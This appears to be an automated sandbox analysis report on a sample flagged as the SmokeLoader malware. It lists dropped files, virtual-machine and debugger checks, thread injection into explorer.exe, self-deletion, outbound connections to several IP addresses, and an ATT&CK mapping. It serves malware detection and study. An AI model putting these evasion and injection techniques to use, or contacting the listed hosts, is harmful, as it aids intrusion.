Code function: 8_2_004050FA LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

8_2_004050FA

Source: F8FA.exe.1.dr

Static PE information: real checksum: 0x3a4d3 should be: 0x35896

Source: 3WaqgS34S7.exe	Static PE information: section name: .voheba
Source: 3WaqgS34S7.exe	Static PE information: section name: .yovu
Source: 3WaqgS34S7.exe	Static PE information: section name: .lobudib
Source: 7E95.exe.1.dr	Static PE information: section name: .kona
Source: 7E95.exe.1.dr	Static PE information: section name: .yip
Source: 7E95.exe.1.dr	Static PE information: section name: .xijewek
Source: F8FA.exe.1.dr	Static PE information: section name: .kona
Source: F8FA.exe.1.dr	Static PE information: section name: .yip
Source: F8FA.exe.1.dr	Static PE information: section name: .xijewek
Source: wrhivcv.1.dr	Static PE information: section name: .kona
Source: wrhivcv.1.dr	Static PE information: section name: .yip
Source: wrhivcv.1.dr	Static PE information: section name: .xijewek
Source: vdhivcv.1.dr	Static PE information: section name: .voheba
Source: vdhivcv.1.dr	Static PE information: section name: .yovu
Source: vdhivcv.1.dr	Static PE information: section name: .lobudib

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401B0D push cs; iretd	0_2_00401B89
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401B1C push cs; iretd	0_2_00401B89
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401AE7 push cs; iretd	0_2_00401B89
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009A1B83 push cs; iretd	0_2_009A1BF0
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009A1B4E push cs; iretd	0_2_009A1BF0
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009A1B74 push cs; iretd	0_2_009A1BF0
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009F84F2 pushfd ; ret	0_2_009F8500
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009F3355 push F6381521h; retf	0_2_009F3365
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009F1E4D push cs; iretd	0_2_009F1E7D
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009F5C4C push ss; iretd	0_2_009F5C4E
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009F5C7D push ss; retf	0_2_009F5C7F
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401B0D push cs; iretd	5_2_00401B89
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401B1C push cs; iretd	5_2_00401B89
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401AE7 push cs; iretd	5_2_00401B89
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_009A1B83 push cs; iretd	5_2_009A1BF0
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_009A1B4E push cs; iretd	5_2_009A1BF0
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_009A1B74 push cs; iretd	5_2_009A1BF0
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00A82045 push F6381521h; retf	5_2_00A82055
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00A871E2 pushfd ; ret	5_2_00A871F0
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00A8493C push ss; iretd	5_2_00A8493E
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00A80B3D push cs; iretd	5_2_00A80B6D
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00A8496D push ss; retf	5_2_00A8496F
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00403306 push ecx; retf 91D9h	7_2_004036A6
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00882EF3 push cs; ret	7_2_00882EF4
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00A44F8E push ss; retf	7_2_00A44F94
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00A46B62 push esp; retf	7_2_00A46BAA
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00A44B71 push ecx; ret	7_2_00A44B72
Source: C:\Users\user\AppData\Roaming\wrhivcv	Code function: 8_2_00402789 push ecx; ret	8_2_0040279C

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wrhivcv	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vdhivcv	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F8FA.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7E95.exe	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wrhivcv			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vdhivcv			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\3waqgs34s7.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\vdhivcv:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\wrhivcv:Zone.Identifier read attributes \| delete			Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\vdhivcv	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\vdhivcv	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vdhivcv, 00000005.00000002.1983433856.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 467	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2924	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 870	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 358	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 353	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1911	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 878	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877	Jump to behavior

Source: C:\Windows\explorer.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F8FA.exe

Jump to dropped file

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Evasive API call chain: GetSystemTime,DecisionNodes	graph_0-5408
Source: C:\Users\user\AppData\Roaming\vdhivcv	Evasive API call chain: GetSystemTime,DecisionNodes	graph_5-5417
Source: C:\Users\user\AppData\Roaming\wrhivcv	Evasive API call chain: GetSystemTime,DecisionNodes	graph_8-4774

Source: C:\Users\user\AppData\Roaming\wrhivcv	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_8-3986
Source: C:\Users\user\AppData\Roaming\wrhivcv	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_8-4377

Source: C:\Users\user\AppData\Roaming\wrhivcv

API coverage: 0.4 %

Source: C:\Windows\explorer.exe TID: 2536	Thread sleep count: 467 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1868	Thread sleep count: 2924 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1868	Thread sleep time: -292400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 180	Thread sleep count: 870 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 180	Thread sleep time: -87000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6668	Thread sleep count: 358 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2924	Thread sleep count: 349 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2924	Thread sleep time: -34900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6516	Thread sleep count: 353 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6516	Thread sleep time: -35300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1868	Thread sleep count: 1911 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1868	Thread sleep time: -191100s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\wrhivcv

8_2_0041D240

Source: explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1731194544.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1731194544.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1731700485.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1731194544.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1731700485.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1729546145.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1731194544.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Roaming\wrhivcv

API call chain: ExitProcess graph end node

graph_8-4379

Source: C:\Users\user\Desktop\3WaqgS34S7.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\3WaqgS34S7.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Roaming\wrhivcv

Code function: 8_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

8_2_00401000

Source: C:\Users\user\AppData\Roaming\wrhivcv

8_2_004050FA

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009A0D90 mov eax, dword ptr fs:[00000030h]	0_2_009A0D90
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009A092B mov eax, dword ptr fs:[00000030h]	0_2_009A092B
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_009F0216 push dword ptr fs:[00000030h]	0_2_009F0216
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_009A0D90 mov eax, dword ptr fs:[00000030h]	5_2_009A0D90
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_009A092B mov eax, dword ptr fs:[00000030h]	5_2_009A092B
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00A7EF06 push dword ptr fs:[00000030h]	5_2_00A7EF06
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00880D90 mov eax, dword ptr fs:[00000030h]	7_2_00880D90
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_0088092B mov eax, dword ptr fs:[00000030h]	7_2_0088092B
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00A3F268 push dword ptr fs:[00000030h]	7_2_00A3F268

Source: C:\Users\user\AppData\Roaming\wrhivcv	Code function: 8_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00401000
Source: C:\Users\user\AppData\Roaming\wrhivcv	Code function: 8_2_004030A9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_004030A9
Source: C:\Users\user\AppData\Roaming\wrhivcv	Code function: 8_2_00404569 SetUnhandledExceptionFilter,	8_2_00404569
Source: C:\Users\user\AppData\Roaming\wrhivcv	Code function: 8_2_0040656A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0040656A

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 7E95.exe.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.35.190.240 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 207.246.75.248 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 123.213.233.131 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.181 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.163.166.52 80	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Thread created: C:\Windows\explorer.exe EIP: 13519D0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Thread created: unknown EIP: 34419D0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Thread created: unknown EIP: 3191970	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1729378564.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1722544893.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1722544893.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1722544893.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1722544893.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: GetStringTypeA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoW,GlobalAlloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,GetThreadContext,FindAtomW,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,DisconnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,GlobalAlloc,InterlockedDecrement,GetSystemTime,	0_2_0041C110
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: GetStringTypeA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoW,GlobalAlloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,GetThreadContext,FindAtomW,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,DisconnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,GlobalAlloc,InterlockedDecrement,GetSystemTime,	5_2_0041C110
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: GetStringTypeA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoA,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,SetThreadContext,FindAtomA,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,ConnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,LocalAlloc,QueryMemoryResourceNotification,	7_2_0041D240
Source: C:\Users\user\AppData\Roaming\wrhivcv	Code function: GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLastError,GetLastError,GetStringTypeExA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoA,_calloc,_realloc,_malloc,_calloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,SetThreadContext,FindAtomA,_memset,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,ConnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,LocalAlloc,InterlockedDecrement,GetSystemTime,QueryMemoryResourceNotification,InterlockedDecrement,GetSystemTime,WriteConsoleOutputCharacterA,WriteConsoleOutputCharacterA,GetMonitorInfoA,GetClassLongW,GetMonitorInfoA,GetClassLongW,	8_2_0041D240
Source: C:\Users\user\AppData\Roaming\wrhivcv	Code function: GetLocaleInfoA,	8_2_0040836B

Source: C:\Users\user\Desktop\3WaqgS34S7.exe

Code function: 0_2_0041C110 GetStringTypeA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoW,GlobalAlloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,GetThreadContext,FindAtomW,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,DisconnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,GlobalAlloc,InterlockedDecrement,GetSystemTime,

0_2_0041C110

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 7.3.7E95.exe.890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.7E95.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.7E95.exe.880e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 7.3.7E95.exe.890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.7E95.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.7E95.exe.880e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Native API	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
